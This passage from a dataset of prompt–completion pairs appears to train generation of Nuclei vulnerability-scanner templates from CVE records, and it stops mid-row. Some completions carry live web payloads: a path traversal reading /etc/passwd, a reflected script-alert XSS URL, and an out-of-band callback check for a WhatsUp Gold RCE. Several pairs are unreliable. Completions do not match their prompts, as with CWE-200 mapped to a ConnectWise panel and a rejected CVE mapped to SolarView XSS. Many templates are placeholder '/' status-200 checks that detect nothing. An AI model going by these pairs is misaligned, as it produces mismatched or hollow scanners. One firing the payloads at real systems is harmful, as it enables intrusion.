id
stringlengths 5
53
| prompt
stringlengths 1.49k
6.97k
| completion
stringlengths 924
11.2M
|
|---|---|---|
gcloud-vpc-network-changes-monitoring-not-enabled
|
[CANONICAL_RECORD]
{
"cve_id": "gcloud-vpc-network-changes-monitoring-not-enabled",
"summary": "Ensure that each Google Cloud Platform (GCP) project has configured an alerting policy that is triggered each time a Virtual Private Cloud (VPC) network change is made. The log filter pattern used to recognize VPC network changes is \"resource.type=gce_network AND protoPayload.methodName=beta.compute.networks.insert OR protoPayload.methodName=beta.compute.networks.patch OR protoPayload.methodName=v1.compute.networks.delete OR protoPayload.methodName=v1.compute.networks.removePeering OR protoPayload.methodName=v1.compute.networks.addPeering\".\n",
"affected_products": [],
"paths": [],
"indicators": [
"Enable VPC Network Changes Monitoring",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "gcloud-vpc-network-changes-monitoring-not-enabled",
"info": {
"name": "Enable VPC Network Changes Monitoring",
"author": "princechaddha",
"severity": "medium",
"description": "Ensure that each Google Cloud Platform (GCP) project has configured an alerting policy that is triggered each time a Virtual Private Cloud (VPC) network change is made. The log filter pattern used to recognize VPC network changes is \"resource.type=gce_network AND protoPayload.methodName=beta.compute.networks.insert OR protoPayload.methodName=beta.compute.networks.patch OR protoPayload.methodName=v1.compute.networks.delete OR protoPayload.methodName=v1.compute.networks.removePeering OR protoPayload.methodName=v1.compute.networks.addPeering\".\n",
"tags": [
"cloud",
"devops",
"gcp",
"gcloud",
"vpc",
"google-cloud-monitoring",
"gcp-cloud-config"
],
"reference": [
"https://cloud.google.com/monitoring/alerts",
"https://cloud.google.com/logging/docs/audit"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-gcloud-vpc-network-changes-monitoring-not-enabled",
"timestamp": "2025-11-13T15:15:38.506131Z"
}
}
|
ntop-panel-exposed
|
[CANONICAL_RECORD]
{
"cve_id": "ntop-panel-exposed",
"summary": "ntop Network Traffix Exposed. This template detects ntop Network Traffix Exposed by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"Configure ntop",
"directory is properly installed",
"text/html"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "ntop-panel-exposed",
"info": {
"name": "ntop Network Traffix Exposed",
"author": "tess",
"severity": "info",
"description": "ntop Network Traffix Exposed",
"tags": [
"misconfig",
"ntop",
"exposure",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Configure ntop",
"directory is properly installed"
],
"condition": "and"
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-ntop-panel-exposed",
"timestamp": "2025-11-13T15:15:51.207434Z"
}
}
|
password-policy-num-unconfigured
|
[CANONICAL_RECORD]
{
"cve_id": "password-policy-num-unconfigured",
"summary": "The Alibaba RAM password policy does not enforce the inclusion of at least one numeric character, increasing the risk of weak passwords and potential unauthorized access.\n",
"affected_products": [],
"paths": [],
"indicators": [
"RAM Password Policy requires atleast One Number - Unconfigured",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "password-policy-num-unconfigured",
"info": {
"name": "RAM Password Policy requires atleast One Number - Unconfigured",
"author": "DhiyaneshDK",
"severity": "medium",
"description": "The Alibaba RAM password policy does not enforce the inclusion of at least one numeric character, increasing the risk of weak passwords and potential unauthorized access.\n",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"alibaba-ram"
],
"reference": [
"https://www.alibabacloud.com/help/en/ram/user-guide/configure-a-password-policy-for-ram-users",
"https://www.trendmicro.com/cloudoneconformity/knowledge-base/alibaba-cloud/AlibabaCloud-RAM/require-number-password-policy.html"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-password-policy-num-unconfigured",
"timestamp": "2025-11-13T15:15:37.759205Z"
}
}
|
privesc-elvish
|
[CANONICAL_RECORD]
{
"cve_id": "privesc-elvish",
"summary": "elvish is a Unix shell that emphasizes expressiveness and extensibility. It aims to provide a more user-friendly and programmable shell experience, with features such as a powerful scripting language, a rich set of data types, and a clean and consistent syntax.\n",
"affected_products": [],
"paths": [],
"indicators": [
"elvish - Privilege Escalation",
"detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "privesc-elvish",
"info": {
"name": "elvish - Privilege Escalation",
"author": "daffainfo",
"severity": "high",
"description": "elvish is a Unix shell that emphasizes expressiveness and extensibility. It aims to provide a more user-friendly and programmable shell experience, with features such as a powerful scripting language, a rich set of data types, and a clean and consistent syntax.\n",
"tags": [
"code",
"linux",
"elvish",
"privesc",
"local"
],
"reference": [
"https://gtfobins.github.io/gtfobins/elvish/"
]
},
"requests": [
{
"method": "GET",
"path": [
"/"
],
"matchers": [
{
"type": "status",
"status": [
200
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-privesc-elvish",
"timestamp": "2025-11-13T15:15:38.964714Z"
}
}
|
CVE-2021-24522
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2021-24522",
"summary": "The User Registration, User Profile, Login & Membership \u2013 ProfilePress (Formerly WP User Avatar) WordPress plugin before 3.1.11's widget for tabbed login/register was not properly escaped and could be used in an XSS attack which could lead to wp-admin access. Further, the plugin in several places assigned $_POST as $_GET which meant that in some cases this could be replicated with just $_GET parameters and no need for $_POST values.",
"affected_products": [
{
"vendor": "properfraction",
"product": "profilepress",
"version_range": "< 3.1.11"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://wpscan.com/vulnerability/25b51add-197c-4aff-b1a8-b92fb11d8697",
"snippet": "PoC available at https://wpscan.com/vulnerability/25b51add-197c-4aff-b1a8-b92fb11d8697"
},
{
"source": "nvd",
"url": "https://wpscan.com/vulnerability/25b51add-197c-4aff-b1a8-b92fb11d8697",
"snippet": "PoC available at https://wpscan.com/vulnerability/25b51add-197c-4aff-b1a8-b92fb11d8697"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2021-24522",
"info": {
"name": "ProfilePress < 3.1.11 - Cross-Site Scripting",
"author": "ritikchaddha",
"severity": "medium",
"description": "The ProfilePress plugin for WordPress before 3.1.11 is vulnerable to unauthenticated reflected cross-site scripting (XSS) via the tabbed login/register widget due to improper escaping of user input. Attackers can inject arbitrary JavaScript via the tabbed-login-name parameter.\n",
"tags": [
"cve",
"cve2021",
"wordpress",
"wp",
"wp-plugin",
"wp-user-avatar",
"profilepress",
"xss",
"vuln"
],
"reference": [
"https://wpscan.com/vulnerability/25b51add-197c-4aff-b1a8-b92fb11d8697/",
"https://plugins.trac.wordpress.org/changeset/2561271/wp-user-avatar",
"https://nvd.nist.gov/vuln/detail/CVE-2021-24522"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"wp-user-avatar"
]
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<script>alert(document.domain)</script>"
]
},
{
"type": "word",
"part": "content_type",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 2,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2021-24522",
"timestamp": "2025-11-13T15:15:42.920838Z"
}
}
|
acti-panel
|
[CANONICAL_RECORD]
{
"cve_id": "acti-panel",
"summary": "ACTi Video Monitoring Panel - Detection. This template detects ACTi Video Monitoring Panel - Detection by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}/cgi-bin/videoconfiguration.cgi"
],
"indicators": [
"Web Configurator",
"ACTi"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "acti-panel",
"info": {
"name": "ACTi Video Monitoring Panel - Detection",
"author": "DhiyaneshDk",
"severity": "info",
"description": "ACTi Video Monitoring Panel - Detection",
"tags": [
"acti",
"panel",
"login",
"detect",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/cgi-bin/videoconfiguration.cgi"
],
"matchers": [
{
"type": "word",
"words": [
"Web Configurator",
"ACTi"
],
"condition": "and"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-acti-panel",
"timestamp": "2025-11-13T15:15:48.028047Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "dns-waf-detect",
"severity": "info",
"tags": [
"tech",
"waf",
"dns",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "detect-dangling-cname",
"severity": "info",
"tags": [
"dns",
"takeover",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "connectwise-panel",
"info": {
"name": "ConnectWise Control Remote Support Software Panel - Detect",
"author": "johnk3r",
"severity": "info",
"description": "ConnectWise Control Remote Support Software Panel - Detect",
"tags": [
"screenconnect",
"panel",
"connectwise",
"detect",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/Login"
],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(header, \"ScreenConnect\")",
"contains(body, \"ConnectWise Control Remote Support\")"
],
"condition": "or"
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"max_redirects": 2
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-connectwise-panel",
"timestamp": "2025-11-13T15:15:48.314429Z"
}
}
|
CVE-2015-4694
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2015-4694",
"summary": "Directory traversal vulnerability in download.php in the Zip Attachments plugin before 1.5.1 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the za_file parameter.",
"affected_products": [
{
"vendor": "zip_attachments_project",
"product": "zip_attachments",
"version_range": "<= 1.5"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
},
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://www.openwall.com/lists/oss-security/2015/06/12/4",
"snippet": "PoC available at http://www.openwall.com/lists/oss-security/2015/06/12/4"
},
{
"source": "nvd",
"url": "http://www.openwall.com/lists/oss-security/2015/06/21/2",
"snippet": "PoC available at http://www.openwall.com/lists/oss-security/2015/06/21/2"
},
{
"source": "nvd",
"url": "http://www.vapid.dhs.org/advisory.php?v=126",
"snippet": "PoC available at http://www.vapid.dhs.org/advisory.php?v=126"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2015-4694",
"info": {
"name": "WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval",
"author": "0x_Akoko",
"severity": "high",
"description": "WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.",
"tags": [
"cve2015",
"cve",
"wp-plugin",
"wpscan",
"lfi",
"wordpress",
"zip_attachments_project",
"vuln"
],
"reference": [
"https://wordpress.org/plugins/zip-attachments/#developers",
"https://wpscan.com/vulnerability/8047",
"https://nvd.nist.gov/vuln/detail/CVE-2015-4694",
"http://www.vapid.dhs.org/advisory.php?v=126",
"https://wordpress.org/plugins/zip-attachments/changelog/"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"
],
"matchers": [
{
"type": "regex",
"regex": [
"root:[x*]:0:0"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2015-4694",
"timestamp": "2025-11-13T15:15:40.809616Z"
}
}
|
CVE-2024-4885
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2024-4885",
"summary": "In WhatsUp Gold versions released before 2023.1.3,\u00a0an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold.\u00a0\u00a0The \n\nWhatsUp.ExportUtilities.Export.GetFileWithoutZip\n\n\n\n allows execution of commands with iisapppool\\nmconsole privileges.",
"affected_products": [
{
"vendor": "progress",
"product": "whatsup_gold",
"version_range": "< 23.1.3"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2024-4885",
"info": {
"name": "Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution",
"author": "SinSinology,iamnoooob,rootxharsh,pdresearch",
"severity": "critical",
"description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n",
"tags": [
"cve",
"cve2024",
"rce",
"progress",
"whatsup",
"lfi",
"kev",
"vkev",
"vuln"
],
"reference": [
"https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024",
"https://www.zerodayinitiative.com/advisories/ZDI-24-893/",
"https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/",
"https://www.progress.com/network-monitoring",
"https://github.com/sinsinology/CVE-2024-4885"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "interactsh_protocol",
"words": [
"http"
]
},
{
"type": "word",
"part": "interactsh_request",
"words": [
"sPassword"
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2024-4885",
"timestamp": "2025-11-13T15:15:46.925808Z"
}
}
|
CVE-2022-29301
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2022-29301",
"summary": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2021-20660. Reason: This candidate is a reservation duplicate of CVE-2021-20660. Notes: All CVE users should reference CVE-2021-20660 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2640",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"packetstorm",
"kernel",
"ubuntu",
"linux",
"privesc",
"local",
"canonical",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-4911",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"glibc",
"looneytunables",
"linux",
"privesc",
"local",
"kev",
"gnu",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-6246",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"glibc",
"linux",
"privesc",
"local",
"gnu",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2022-29301",
"info": {
"name": "SolarView Compact 6.00 - 'pow' Cross-Site Scripting",
"author": "For3stCo1d",
"severity": "high",
"description": "SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.\n",
"tags": [
"cve",
"cve2022",
"xss",
"solarview",
"edb",
"vuln"
],
"reference": [
"https://www.exploit-db.com/exploits/50968",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301",
"https://github.com/ARPSyndicate/cvemon",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<script>alert(document.domain)</script><\"\">",
"SolarView"
],
"condition": "and"
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2022-29301",
"timestamp": "2025-11-13T15:15:44.254821Z"
}
}
|
CWE-200
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-200",
"summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"unauthorized"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "fbi-seized-nameserver",
"severity": "info",
